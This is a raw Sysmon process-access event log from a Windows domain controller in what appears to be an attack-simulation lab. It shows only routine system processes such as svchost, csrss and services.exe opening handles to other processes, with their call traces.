13:29:55.607{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009909Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:55.607{08A6967A-4286-6000-0500-000000009A01}636752C:\Windows\system32\csrss.exe{08A6967A-4753-6000-1305-000000009A01}1948C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000009908Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:55.607{08A6967A-4750-6000-0205-000000009A01}47883304C:\Windows\system32\csrss.exe{08A6967A-4753-6000-1205-000000009A01}1916C:\Windows\system32\ServerManagerLauncher.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000009907Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:55.607{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009906Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:55.607{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009905Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:55.607{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009904Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:55.607{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009903Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:55.607{08A6967A-4286-6000-0500-000000009A01}636652C:\Windows\system32\csrss.exe{08A6967A-4753-6000-1205-000000009A01}1916C:\Windows\system32\ServerManagerLauncher.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000009902Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:55.607{08A6967A-4288-6000-1000-000000009A01}11364692C:\Windows\system32\svchost.exe{08A6967A-4753-6000-1205-000000009A01}1916C:\Windows\system32\ServerManagerLauncher.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6f453|C:\Windows\System32\KERNEL32.DLL+1d37f|c:\windows\system32\UBPM.dll+ac60|c:\windows\system32\UBPM.dll+f974|c:\windows\system32\UBPM.dll+cd3c|c:\windows\system32\UBPM.dll+10806|c:\windows\system32\UBPM.dll+d3a9|c:\windows\system32\UBPM.dll+dc05|c:\windows\system32\UBPM.dll+e91d|c:\windows\system32\UBPM.dll+e12a|c:\windows\system32\UBPM.dll+dd82|c:\windows\system32\EventAggregation.dll+3e22|c:\windows\system32\EventAggregation.dll+36c9|c:\windows\system32\EventAggregation.dll+332f|c:\windows\system32\EventAggregation.dll+2e28|C:\Windows\SYSTEM32\ntdll.dll+65b65|C:\Windows\SYSTEM32\ntdll.dll+6586d|C:\Windows\SYSTEM32\ntdll.dll+656d0|C:\Windows\SYSTEM32\ntdll.dll+3a800|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009901Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:55.592{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009900Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:55.592{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009899Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:55.592{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009898Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:55.592{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009897Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:55.592{08A6967A-4286-6000-0500-000000009A01}6362368C:\Windows\system32\csrss.exe{08A6967A-4753-6000-1005-000000009A01}1644C:\Windows\System32\XblGameSaveTask.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000009896Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:55.592{08A6967A-4288-6000-1000-000000009A01}11361212C:\Windows\system32\svchost.exe{08A6967A-4753-6000-1005-000000009A01}1644C:\Windows\System32\XblGameSaveTask.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|c:\windows\system32\UBPM.dll+a711|c:\windows\system32\UBPM.dll+f974|c:\windows\system32\UBPM.dll+cd3c|c:\windows\system32\UBPM.dll+d305|c:\windows\system32\UBPM.dll+dc05|c:\windows\system32\UBPM.dll+e91d|c:\windows\system32\UBPM.dll+e12a|c:\windows\system32\UBPM.dll+dd82|c:\windows\system32\EventAggregation.dll+3e22|c:\windows\system32\EventAggregation.dll+36c9|c:\windows\system32\EventAggregation.dll+332f|c:\windows\system32\EventAggregation.dll+2e28|C:\Windows\SYSTEM32\ntdll.dll+65b65|C:\Windows\SYSTEM32\ntdll.dll+6586d|C:\Windows\SYSTEM32\ntdll.dll+656d0|C:\Windows\SYSTEM32\ntdll.dll+3a800|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009895Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:55.592{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4288-6000-1000-000000009A01}1136C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8b22|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009894Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:55.592{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4288-6000-1000-000000009A01}1136C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8b22|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009893Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:55.592{08A6967A-4287-6000-0C00-000000009A01}5883124C:\Windows\system32\svchost.exe{08A6967A-4288-6000-1000-000000009A01}1136C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8b22|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009892Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:55.592{08A6967A-4287-6000-0C00-000000009A01}5881168C:\Windows\system32\svchost.exe{08A6967A-4288-6000-1000-000000009A01}1136C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8b22|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009891Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:55.592{08A6967A-4287-6000-0C00-000000009A01}5881168C:\Windows\system32\svchost.exe{08A6967A-4288-6000-1700-000000009A01}1744C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+6a63|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009890Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:55.592{08A6967A-4287-6000-0C00-000000009A01}5883124C:\Windows\system32\svchost.exe{08A6967A-4288-6000-1000-000000009A01}1136C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8b22|c:\windows\system32\lsm.dll+8a76|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009889Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:55.592{08A6967A-4287-6000-0C00-000000009A01}5883124C:\Windows\system32\svchost.exe{08A6967A-4288-6000-1000-000000009A01}1136C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8a38|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009888Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:55.592{08A6967A-4286-6000-0A00-000000009A01}8441220C:\Windows\system32\services.exe{08A6967A-4753-6000-0F05-000000009A01}1084C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\system32\services.exe+18ff|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009887Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:55.592{08A6967A-4287-6000-0C00-000000009A01}5883124C:\Windows\system32\svchost.exe{08A6967A-4753-6000-0F05-000000009A01}1084C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009886Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:55.592{08A6967A-4287-6000-0C00-000000009A01}5883124C:\Windows\system32\svchost.exe{08A6967A-4751-6000-0605-000000009A01}4632C:\Windows\system32\dwm.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8b22|c:\windows\system32\lsm.dll+8a76|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009885Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:55.576{08A6967A-4287-6000-0C00-000000009A01}5883124C:\Windows\system32\svchost.exe{08A6967A-4751-6000-0605-000000009A01}4632C:\Windows\system32\dwm.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8a38|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009884Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:55.545{08A6967A-4750-6000-0205-000000009A01}47883304C:\Windows\system32\csrss.exe{08A6967A-4753-6000-0F05-000000009A01}1084C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000009883Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 